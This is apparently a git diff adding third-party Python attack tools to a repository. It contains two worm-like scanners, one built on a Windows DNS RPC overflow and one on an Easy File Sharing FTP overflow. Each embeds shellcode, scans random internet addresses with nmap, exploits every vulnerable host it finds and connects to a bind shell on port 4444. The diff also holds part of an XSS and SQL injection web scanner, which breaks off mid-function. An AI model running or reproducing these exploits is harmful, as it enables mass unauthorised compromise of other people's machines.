"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" +shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" +shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" +shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" +shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" +shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" +shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" +shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" +shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" +shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" +shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" +shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" +shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" +shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" +shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" +shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" +shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" +shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" +shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" +shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" +shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" +shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" + +# Stub sections taken from metasploit +stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' +stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' +stub += '\x00\x00\x00\x00\x12\x05\x00\x00' +stub += '\\A' * 465 +# At the time of overflow ESP points into our buffer which has each char +# prepended by a '\' and our shellcode code is about 24+ bytes away from +# where EDX points +stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll +# The following B's which in assembly translates to 'inc EDX' increments +# about 31 times EDX so that it points into our shellcode +stub += '\\B' * 43 +# Translates to 'jmp EDX' +stub += '\\\xff\\\xe2' +stub += '\\A' * 134 +stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' +stub += '\x03\x00\x00\x00\x47\x00\x00\x00' +stub += shellcode + +def timer(): + now = time.localtime(time.time()) + return time.asctime(now) + +# Code ripped from core security document on impacket +# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf +# Not a neat way to discover a dynamic port :-) +def DiscoverDNSport(target): + trans = transport.SMBTransport(target, 139, 'epmapper') + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) + pm = epm.DCERPCEpm(dce) + handle = '\x00'*20 + while 1: + dump = pm.portmap_dump(handle) + if not dump.get_entries_num(): + break + handle = dump.get_handle() + entry = dump.get_entry().get_entry() + if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): + port = entry.get_string_binding().split('[')[1][:-1] + return int(port) + + print '[-] Could not locate DNS port; Target might not be running DNS' + +def ExploitDNS(target, port): + trans = transport.TCPTransport(target, port) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) + + dce.call(0x01, stub) + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + + +def Worker(): + + global num + global found + + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -T 3 -O --host-timeout 35s --osscan-guess -iR 1')[1]).readlines() #Change your nmap flags if needed + + for tmp in nmap: + if re.search("QUITTING!",tmp): + print '[-] You must run this script as root for the nmap flags to work properly!!!' + print 'Type: Ctrl-C\n' + sys.exit(1) + ip = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ip: + target = ip[0] + print "Searching:",target + for tmp in nmap: + if re.search("Aggressive OS guesses:", tmp): + os = tmp.split(",",1)[0].replace("Aggressive OS guesses:","") + if os: + os = re.sub(r'\(\d+%\)',"",os,1) + print "\tFound:",os + num +=1 + if re.search("Windows 2000",os): #Take out the 2000 to exploit all windows found machines + found.append(target+" : "+os) + print "\tFound a Win2000 machine:",os + print '\n[+] Locating DNS RPC port' + port = DiscoverDNSport(target) + print '[+] Located DNS RPC service on TCP port: %d' % port + ExploitDNS(target, port) + print '[+] Exploit sent. Connecting to shell in 3 seconds' + time.sleep(3) + ConnectRemoteShell(target) + +if len(sys.argv) != 2: + print "\n\t d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "\t--------------------------------------------------" + print "\n\tUsage: ./DNSRPCscanner.py \n" + print "\tEx. ./DNSRPCscanner.py 10000\n" + sys.exit(1) + +else: + print "\n d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "--------------------------------------------------" + print "[+] Scanning: 0day Windows DNS RPC service vulnerability" + print "[+] Targets:",int(sys.argv[1]) + print "[+] Starting:",timer(),"\n" + print "[+] Scanning...\n" + found = [] + num = 0 + for x in range(10): + for i in range(int(sys.argv[1])/10): + time.sleep(random.randint(1, 3)) + work = thread.start_new_thread(Worker, ()) +print "\n[-] Scanning Complete:",timer() +print "[-] Found:",num,"o-systems" +print "[-] Found:",len(found),"using win2k\n" +if len(found) >=1: + print "[-] Target List:\n" + for os in found: + print os + + + + diff --git a/3rdparty/EFSscan.py b/3rdparty/EFSscan.py new file mode 100644 index 0000000..cb94578 --- /dev/null +++ b/3rdparty/EFSscan.py @@ -0,0 +1,146 @@ +#!/usr/bin/python +#Modified Winny Thomas EFS exploit to scan(uses nmap) for random open ftp ports then +#check the banner for EFS server, if found, exploit it... +#http://www.milw0rm.com/exploits/3579 +#d3hydr8[at]gmail[dot]com + +# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability +# was discovered by h07 and a POC for windows XP SP2 (polish version) was +# provided. This exploit was tested on windows 2000 server SP4. The exploit +# binds a shell on TCP port 4444. +# +# Author shall bear no responsibility for any screw ups +# Winny Thomas :-) + +import os +import sys +import time +import struct +import socket +import StringIO, re, commands + +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" +shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x4b\x38\x4e\x37" +shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" +shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58" +shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34" +shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48" +shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d" +shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x58" +shellcode += "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x47\x37\x43\x57" +shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" +shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" +shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" +shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x31" +shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d" +shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56" +shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55" +shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x4a\x36\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x44\x4e\x32" +shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" +shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x46" +shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f" +shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" +shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a" + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + +def ExploitFTP(target): + sockAddr = (target, 21) + tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + tsock.connect(sockAddr) + response = tsock.recv(1024) + print response + + # At the time of overflow EBX points into our shellcode + payload = 'A' * 2553 + # NOP's pad with a 15 byte jump over some junk and the RET address + # Jumps into our shellcode + payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f' + # Address of 'call ebx' from kernel32.dll SP4 + payload += struct.pack('" + sys.exit(1) +else: + num=sys.argv[1] + + print "\n d3hydr8[at]gmail[dot]com EFSScan v1.0" + print "--------------------------------------------------" + print "+ Target: Easy File Sharing FTP server V2.0" + print "+ Target port: 21" + print "+ Scanning:",num,"\n" + + count = 0 + while count != int(num): + count += 1 + print "Trying:",count,"of",num + #Change your nmap arguments, if you want. + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -p 21 -iR 1 | grep -B 4 open')[1]).readlines() + for tmp in nmap: + if re.search("21/tcp\s+(?=open)", tmp): + port = int(21) + for tmp in nmap: + ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ipaddr: + host = ipaddr[0] + print "\n- Found port open on",host,"checking banner." + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(10) + s.connect((host, port)) + time.sleep(7) + s.send("\r\n") + response = s.recvfrom(1024)[0] + s.close() + #Change this to whatever EFS banner looks like. (use lowercase) + if re.search("easy file", response.lower()): + print "\n\t\tEFS server found in banner, attempting to exploit...\n" + ExploitFTP(host) + else: print "\tNo Match:",response,"\n" + except(socket.error,NameError), msg: + print "\tAn error occurred:", msg,"\n" + s.close() +# milw0rm.com [2006-08-26] + diff --git a/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py new file mode 100644 index 0000000..ecf42d7 --- /dev/null +++ b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py @@ -0,0 +1,1041 @@ +#!/usr/bin/python + +# VulnDetector Version 0.0.1pa +# Author: Brad Cable +# License: GPL Version 2 + + +## basic config - these need to be changed depending on the site to be scanned ## + +site="http://www.site.com/" # URL to tree/scan +domains=[".site.com",".site2.com"] # whitelist of domains to scan, with a "." infront, it matches all subdomains as well +pagetype="php" # type of code used on the site being scanned ("php" or "asp") + +# log locations, all logs are stored at [the current directory]/logs/LOGFILE +vulnlogfile="gfqlog" # file to log all detected vulnerabilities as they are encountered +urllogfile="gfqurllog" # file to log all urls fetched as they are fetched +reportfile="gfqreport" # at the end of the scan, the detected vulnerabilities are compiled into a neat list, and logged to this file +usecookies=True # whether or not to send a cookie header value each time (True or False) +cookies="" # if usecookies is True, then + +## end basic config ## + + + + + +## advanced config - only change these if you know what you are doing, you really shouldn't need to touch these at all... ## + +xssscan=True # scan for XSS vulns (True or False) +sqliscan=True # scan for SQLI vulns (True or False) + +checklevel=1 # checklevel: + # 1 = Silent SQL, Silent XSS + # 2 = Silent SQL, Silent XSS when possible (semi-silent when not) + # 3 = BLAST THE SITE! (AKA, non Silent SQL, non Silent XSS, causes tons of MySQL Errors + # on the site and could possibly flood someone's admin email) + +levels=7 # levels deep to tree the site (I recommend 6-8; 6 is shorter, and fairly thorough, while 8 is just plain crazy long and a little too thorough) +ignore_subdomain=True # ignore subdomains for HTTP Host field and other places (should leave as True) + +scanlimit=5 # times to scan the same URL with different query strings, + # "bob.php?id=1" and "bob.php?id=2" count as two scans, + # and until scanlimit is hit, it will continue to check + # vulnerabilities on that URL + +indent=" " # indent used when displaying the results +ignorefileext="swf,fla,gif,jpeg,jpg,tiff,png,mng,pdf,dat,mpeg,mpg,mp2,mp3,wav,mod,mov,avi,asf,asx,ogg,asc,tgz,rpm,deb,gz,bz2,zip,rar,c,cpp,h,o,ko,py,so,torrent,js,css,msi,exe,bin,dmg,x86,ut4mod,wmv,rmvb,txt,n64,cbs,max,xps,xpi" # list of file extensions that shouldn't be downloaded and scanned + +randidentlen=6 # this is so internal, you shouldn't touch it whatsoever +decapitation=True # this is so internal, you shouldn't touch it whatsoever + +## end advanced config ## + + +######################################## +### DO NOT TOUCH THE REST!!! ### +######################################## + +## setup ## + +# import modules +import socket,sre,time,random + +# debugging +from sys import exit # exit() for debug +# debug mode +from sys import argv +debug=False +if len(argv)>=2: debug=(argv[1]=="1") + +# declare output variables +urlfields={} +postfields={} +treedurls={} +reportvar={} + +# get comment type to use +if pagetype=="asp": comnt="%2d%2d" +elif pagetype=="php": comnt="/*" +else: + print "Unknown Page Type: "+pagetype.upper() + print "Using Default Database Comment: --" + comnt="%2d%2d" + +# get session stuff to use +sessstr="(?i)" +if pagetype=="asp": sessstr+="aspsessionid([a-z]{8})=([a-z]{8})" +elif pagetype=="php": sessstr+="phpsessid=([a-z0-9]{32})" +else: + print "Unknown Page Type: "+pagetype.upper() + sessstr+=pagetype+"sessid=([a-z0-9]{32})" + print "Using Default Session Syntax: --" + +# set up the ignore file extension variable to be useable +ignorefileext=","+ignorefileext+"," + +## end setup ## + + +## function declaration ## + +# function to determine if a list object is empty in any way +def listempty(listarg): return (listarg==None or listarg==[] or type(listarg)!=type([]) or len(listarg)==0) + +# function to edit files easily +def filestuff(fname,body="",fptype=False): + + if not fptype: + if body=="": fptype="r" + else: fptype="a" + + fp=open(fname,fptype) + fp.write(str(body)) + fp.close() + +# function to remove non unique items +def uniqlist(listarg): + if type(listarg)!=type([]): return + newlist=[] + for i in range(len(listarg)): + if newlist.count(listarg[i])==0: newlist[len(newlist):len(newlist)]=[listarg[i]] + return newlist + +# function to get the page name of a url +def pagename(url): + if url[:7]=="http://": url=url[7:] + slash=url.find("/") + if slash!=-1: url=url[slash:] + else: url="/" + return url + +# function to fix urls like "http://www.google.com" or "www.google.com" into "http://www.google.com/" +def urlfix(url): + if url[:7]!="http://": url="http://"+url + slash=url[7:].find("/") + if slash==-1: url+="/" + return url + +# function to get the server name of a url +def servername(url,ig_subd=ignore_subdomain): + url=urlfix(url)[7:] + url=url[:url.find("/")] +# if ig_subd: url=sre.sub("^.*?([^\.]*\.[^\.]*)$","\\1",url) + return url + +def checkserver(server): + global domains + for domain in domains: + if domain[:1]==".": + if server[-len(domain)+1:]==domain[1:]: return True + else: + if server==domain: return True + return False + +# function to fix the headers so they don't contain %25's (%'s) or the xxploit code +def headerfupr(hdr,explt): + hdr=hdr.replace("%25","%") + hdr=hdr.replace(explt,"") + return hdr + +# function to remove urls from the body of a page +def removeurls(body): return sre.sub("http://([^ \"\']+)","",body) + +# function to retreive the full path of a url based on the current page url +def fullpath(url,pageurl): + + if url.lower()[:7]=="http://": return url + + if pageurl.count("?")!=0: pageurl=pageurl[:pageurl.find("?")] + + if url.count("?")>0: + if url[:1]=="?": return pageurl+url + pageurl=pageurl[:pageurl.find("?")] + + #pageurl=pageurl[:pageurl.find("?")] + + pagedomain=pageurl[:pageurl[7:].find("/")+7] + if url[:1]=="/": return pagedomain+url + + pagepath=pageurl[pageurl[7:].find("/")+7:] + pagepath=pagepath[:pagepath.rfind("/")+1] + path=pagepath+url + path=sre.sub("\.\/","\/",path) + path=sre.sub("\/([^\/]+)\/..\/","\/",path) + + return pagedomain+path + +# function to get the value of HTML attribute before a ">" +def getattrval(body,attr): + body=sre.sub("([^\>]*)\>([^\000]*)","\\1",body) + if sre.search(attr+"=(\"|'|)([^\\1\ \>]*)\\1",body)!=None: + delim=sre.sub("[^\>]* "+attr+"=(\"|'|)([^\\1\ \>]*)\\1([^\>]*)","\\1",body) + exp="[^\>]* "+attr+"=(\\"+delim+")([^" + if delim=="": exp+="\ " + else: exp+=delim + exp+="\>]*)\\"+delim+"([^\>]*)" + return sre.sub(exp,"\\2",body) + else: return "" + +# function to retreive a page based on input +def getpage(url,dheaders=1,redir=0,realpage=0,poststring="",exceptions=0): + + # function to recurse and try getpage() again with new values + def recurse(exceptions): + + sock.close() + exceptions+=1 + + if exceptions<=6: return getpage(url,dheaders,redir,realpage,poststring,exceptions) + else: + print "Too many recursions, skipping..." + return + + + global usecookies,urllogfile,debug,ignorefileext + if not checkserver(servername(url)): return + + if url.find("#")!=-1: url=url[:url.find("#")] + + # file extensions that need to be ignored code + fileext=sre.sub(".*(http\://[^/]*/).*","\\1",url) + if url==fileext: fileext="None" + else: fileext=sre.sub("^.*\/[^/]*\.([^\&\#\?\/]*)[^/]*$","\\1",url) + if ignorefileext.count(","+fileext+",")!=0: return + + try: + + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((servername(url,False),80)) + + workurl=pagename(url) + theurl=url + if redir!=1: theurl=workurl + + qrytype="GET" + if poststring!="": qrytype="POST" + out=(qrytype+" "+theurl+" HTTP/1.1\n" + "Host: "+servername(url,False)+"\n" + "Connection: close\n") + if usecookies: + global cookies + out+="Cookie: "+cookies+"\n" + if poststring!="": + out+="Content-Type: application/x-www-form-urlencoded\n" + out+="Content-Length: "+str(len(poststring)) + out+="\n\n"+poststring+"\n" + out+="\r\n\r\n" + sock.send(out) + + # get response type and log the page + response=sock.recv(12)[-3:] + fp=open("logs/"+urllogfile,"a") + fp.write(url+": "+response+" "+str(realpage)+"\n") + if poststring!="": fp.write(indent+"POST: "+poststring+"\n") + fp.close() + + + # at 404 response, close connection and fail + if response=="404" or response=="500": + sock.close() + return + + # at 30[1237] response types, recurse new page + if sre.search("30[1237]",response): + while 1: + chunk="" + byte=sock.recv(1) + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + if chunk.lower()[:9]=="location:": + location=chunk.lower()[9:].strip() + if location=="http://"+servername(url,False)+url: location="/" + locpage=fullpath(location,url) + sock.close() +# if url[len(url)-2:]=="" and locpage[len(locpage)-4:]=="": break + redir=1 + if locpage!=url: + redir=0 + if pagename(sre.sub("\\\\(\"|\')","\\1",locpage))==pagename(url): + print "QUOTE REDIR" + return + print "OLD:",url + print "NEW:",chunk.lower() + print "REDIR:",locpage + return getpage(locpage,redir=redir,realpage=realpage) + if realpage==1: + sock.close() + return + + elif realpage==1: + sock.close() + return url + + # get headers, ignoring certain HTTP headers + headers="" + type=0 + while 1: + chunk="" + byte=sock.recv(1) + if byte=="\r": + sock.recv(1) + break + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + + if chunk.lower()[:11]!="set-cookie:" and chunk.lower()[:5]!="date:" and chunk.lower()[:15]!="content-length:" and chunk.lower()[:11]!="keep-alive:" and chunk.lower()[:18]!="transfer-encoding:" and chunk.lower()[:11]!="connection:": + headers+=chunk + +# if chunk.lower()[:15]=="content-length:": +# type=1 +# conlen=int(chunk[16:]) + + if chunk.lower()[:26]=="transfer-encoding: chunked": type=2 + + # no special type specified, just get the page + if type==0: + body="" + while 1: + chunk=sock.recv(200) + body+=chunk + if chunk=="": break + + + # set it up if it does have a type +# else: +# byte=sock.recv(1) +# if byte=="\r": sock.recv(1) +# else: +# while 1: +# i=-1 +# while byte!="\r": +# i+=1 +# byte=sock.recv(1) +# nbytes=sock.recv(3) +# if nbytes=="\n\r\n": break + +# # content-length +# if type==1: +# body="" +# for i in range(conlen): +# chunk=sock.recv(1) +# body+=chunk + + # transfer-encoding: chunked + if type==2: + body="" + chunksize="" + while chunksize!=0: + byte="" + chunk="" + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + chunksize=int(chunk,16) + wchunksz=chunksize + while wchunksz>=1: + subchunk=sock.recv(wchunksz) + body+=subchunk + wchunksz-=len(subchunk) + sock.recv(2) + + # clean up and return + sock.close() + if dheaders!=1: headers="" + + return [headers,body,urlfix(url)] + + # catch socket errors, such as "connection reset by peer" - trys again until it gives up and goes on to the next page + except socket.error: + print "Socket Error, Recursing..." + return recurse(exceptions) + +# function to remove everything in the "" tag from a server response +def decapitate(body): + + if body==None: return + + global decapitation + if decapitation==True: body=sre.sub("(.+?)","",body) + + return body + + +# function to generate a random identification string +def randident(thelen=randidentlen,randchars="Bghi3rj9uwEFabTGH1ImnL4xpCstUOvoPYk25qVJK8Z0Q67lWXefMRSDcdyzAN"): +# global randidentlen + rndidnt="" + while len(rndidnt)=4: + body=removeexplt(body,explt) + body=parsebody(body) + body=removeexplt(body,explt) + else: body=parsebody(body) + if randstr!="": body=removeexplt(body,randstr) + + return body + +# function to parse the body for checking agsinst others +def parsebody(body): + + global sessstr,pagetype + + body=body.replace("%2d","-") + body=body.replace("%2D","-") + body=body.replace("%25","%") + body=body.replace("%20"," ") + body=body.replace("+"," ") + body=body.replace("%2b","+") + body=body.replace("%2B","+") + body=body.replace("%22","\"") + body=body.replace("\\\"","\"") + body=body.replace("\\'","'") + body=body.replace("\n","") + body=body.replace("\r","") + body=sre.sub(sessstr,"",body) + + # These might cause problems + body=sre.sub("\]*)\>(.*?)\","",body) + body=sre.sub("\ "+url + + pageinfo=getpage(url) + if listempty(pageinfo): return + + body=pageinfo[1].lower() + + print "AA" + + # select/option, textarea + # check for forms + bodyarr=sre.split("")] + frmbody=bodyarr[i][bodyarr[i].find(">"):][:bodyarr[i].find("")] + + actionurl=getattrval(frmsect,"action") + if actionurl=="" or actionurl==frmsect or actionurl=="\"\"": actionurl=pageinfo[2] + if actionurl.count(";")>0: actionurl=actionurl[actionurl.find(";")+1:] + if actionurl[:11].lower()=="javascript:": continue + actionurl=fullpath(actionurl,pageinfo[2]) + + print "ACTION:",actionurl + + # get the input variables + poststring="" + inputarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|") + for j in range(len(inputarr)): + + name=getattrval(inputarr[j],"name") + if name==inputarr[j] or name=="" or name=="\"\"": continue + + value=getattrval(inputarr[j],"value") + if value==inputarr[j] or value=="" or value=="\"\"": value="" + + if poststring!="": poststring+="&" + poststring+=name+"="+value + + # get select/option tags + selectarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|") + for j in range(len(selectarr)): + + name=getattrval(selectarr[j],"name") + if name==selectarr[j] or name=="" or name=="\"\"": continue + + value=sre.sub("(.*?)\]*)value=(\"|'|)([^\\3\ ]*)\\3([^\>]*)\>(.*?)","\\2",selectarr[j]) + if value==selectarr[j] or value=="" or value=="\"\"": value="" + + if poststring!="": poststring+="&" + poststring+=name+"="+value + print "sel/opt: "+name+"="+value + + if poststring=="": continue + + if sre.search("method=([\'\"]|)post([\'\"]|)",frmsect[:frmsect.find(">")].lower())==None: + if actionurl.find("?")!=-1: actionurl+="&" + else: actionurl+="?" + actionurl+=poststring + body+='' + print 'GETT ' + continue + + # determine if it needs to be scanned, and if so, scan it + postscan=0 + postvars=poststring.split("&") + if postfields.has_key(actionurl): + for j in range(len(postvars)): + postvars[j]=postvars[j][:postvars[j].find("=")] + if postfields[actionurl].count(postvars[j])==0: + postfields[actionurl].append(postvars[j]) + postscan=1 + else: + for j in range(len(postvars)): postvars[j]=postvars[j][:postvars[j].find("=")] + postfields[actionurl]=postvars + postscan=1 + + if postscan==1: + vulns=checkvars(actionurl,poststring) + if not listempty(vulns): dispvulns(vulns,actionurl) + + print "BB" + + # check for urls in "href" tags + # ? # part of 3? (src|href|location|window.open)= and http:// + urlreg="(\'|\")(?!javascript:)(([^\>]+?)(?!\.("+ignorefileext.replace(",","|")+"))(.{3,8}?)(|\?([^\>]+?)))" + urlarr=sre.sub("(?s)(?i)(.+?)((src|href)=|location([\ ]*)=([\ ]*)|window\.open\()"+urlreg+"\\6","\\7|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|") + del urlarr[len(urlarr)-1] + urlarr.append(sre.sub("(?s)(?i)(.+?)(src|href)="+urlreg+"\\3","\\4|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|")) + del urlarr[len(urlarr)-1] + for i in range(len(urlarr)): + + theurl=fullpath(urlarr[i],pageinfo[2]) + if not checkserver(servername(theurl)): continue + + # determine if it needs scanned and/or treed, and if so, scan and/or tree it + getscan=0 + if theurl.count("?")!=0: + nqurl=theurl[:theurl.find("?")] + query=theurl[theurl.find("?")+1:] + query=sre.sub("\&\;","\&",query) + qryvars=query.split("&") + if urlfields.has_key(nqurl): + for j in range(len(qryvars)): + qryvars[j]=qryvars[j][:qryvars[j].find("=")] + if urlfields[nqurl].count(qryvars[j])==0: + urlfields[nqurl].append(qryvars[j]) + getscan=1 + else: + for j in range(len(qryvars)): qryvars[j]=qryvars[j][:qryvars[j].find("=")] + urlfields[nqurl]=qryvars + getscan=1 + else: + if 